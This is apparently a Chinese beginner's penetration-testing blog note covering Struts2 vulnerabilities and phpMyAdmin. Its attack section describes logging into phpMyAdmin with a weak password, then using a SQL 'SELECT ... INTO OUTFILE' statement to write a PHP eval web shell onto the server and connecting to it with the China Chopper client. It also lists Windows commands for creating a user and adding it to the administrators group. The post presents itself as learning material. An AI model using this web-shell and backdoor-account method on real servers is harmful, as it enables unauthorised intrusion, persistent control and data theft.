Web渗透学习(一)

什么是struts2?

Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。其被普遍应用于阿里、京东等各大网站。

本次讲的struts2漏洞是什么?

  • S2-016
  • S2-019
  • S2-032

什么是phpMyAdmin?

phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。

如何使用phpMyAdmin?

  • 下载phpMyAdmin,这是官网连接
  • 解压并备份
  • 找到config.sample.inc.php,改名为config.inc.php,用文本编辑器打开该文件,找到下列代码:
$cfg['blowfish_secret'] = ''

改为

$cfg['blowfish_secret'] = 'c4ca4238a0b923820dcc509a6f75849b';//一个长字符串密码就行
  • 进入apache的conf文件夹下,新建一个phpmyadmin.conf文件,文本编辑器打开,加入下列代码:
Alias /phpmyadmin "c:/phpMyAdmin/"
<Directory "c:/phpMyAdmin/">
Options Indexes FollowSymLinks MultiViews
AllowOverride all
Require all granted
php_admin_value upload_max_filesize 128M
php_admin_value post_max_size 128M
php_admin_value max_execution_time 360
php_admin_value max_input_time 360
</Directory>
  • 在该文件夹内找到配置文件httdp.conf,用文本编辑器打开,在末尾增加一行
Include conf/phpmyadmin.conf

本次讲的phpMyAdmin漏洞是什么?

通过phpMyAdmin弱口令拿shell

本次使用的工具或方法是什么?

  • 工具:struts2漏洞利用工具、听潮URL采集工具
  • 方法:关键词搜索(UPUPW)、弱口令、

本次使用了哪些命令?其作用是什么?

命令代码
查看用户net user
新建用户net user 123 123 /add
提权localgroup administrators 123 /add
删除用户net user 123 /del
查看IPipconfig
查看端口netstat -abn

整理本次的攻击流程

  • 利用弱口令进入phpMyAdmin后台
  • 在sql中输入以下语句
SELECT '<?php @eval($_POST[xk]);?>'
INTO OUTFILE 'D://upupw//htdocs//xk.php'
  • 利用菜刀连接
  • 后续可利用小马或者大马完成渗透
超全的Web渗透学习资料合集,共64篇。 web渗透: web安全原则 web渗透: web渗透测试清单 web渗透: 自动化漏洞扫描 web渗透: Google Hacking web渗透: web服务器指纹识别 web渗透: 枚举web服务器应用 web渗透: 识别web应用框架 web渗透: 配置管理测试 web渗透: 身份管理测试 web渗透: 不安全的HTTP方法 web渗透: 登录认证安全测试 web渗透: 浏览器缓存攻击测试 web渗透: 目录遍历文件包含测试 web渗透: 目录浏览漏洞测试 web渗透: 越权漏洞 web渗透: 任意文件下载 web渗透: 跨站请求伪造(CSRF) web渗透: 服务端请求伪造攻击(SSRF) web渗透: 跨站脚本攻击(XSS) web渗透: HTTP Host头攻击 web渗透: SQL注入(上) web渗透: SQL注入(下) web渗透: XML注入攻击 web渗透: XXE外部实体注入 web渗透: 服务器端包含注入(SSI注入) web渗透: XPath注入 web渗透: 命令注入 web渗透: HTTP响应头拆分漏洞 web渗透: LDAP注入 web渗透: ORM注入 web渗透: Json劫持Json注入 web渗透: 宽字节注入 web渗透: 脆弱的通信加密算法 web渗透: Padding Oracle攻击 web渗透: 未加密信道发送敏感数据 web渗透: 业务逻辑数据验证 web渗透: 伪造请求 web渗透: 验证码功能缺陷 web渗透: 竞争并发漏洞 web渗透: IMAPSMTP注入 web渗透: 本地文件包含远程文件包含 web渗透: 文件上传漏洞 web渗透: web服务器控制台地址泄漏 web渗透: 报错信息测试 web渗透: 不安全的对象引用 web渗透: 基于DOM的XSS跨站 web渗透: 堆栈轨迹测试 web渗透: 常见的数据信息泄露 web渗透: web消息漏洞 web渗透: WebSockets安全测试 web渗透: 异常信息泄漏 web渗透: 防御应用程序滥用 web渗透: 客户端资源处理漏洞 web渗透: HTML注入 web渗透: Flash跨域访问漏洞 web渗透: 客户端URL重定向 web渗透: DNS域传送漏洞 web渗透: 服务器多余端口开放 web渗透: 本地存储安全 web渗透: web服务器解析漏洞 web渗透: JavaScript注入漏洞 web渗透: CSS注入 web渗透: 会话固化漏洞 web渗透: 常见的WAF绕过方法
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值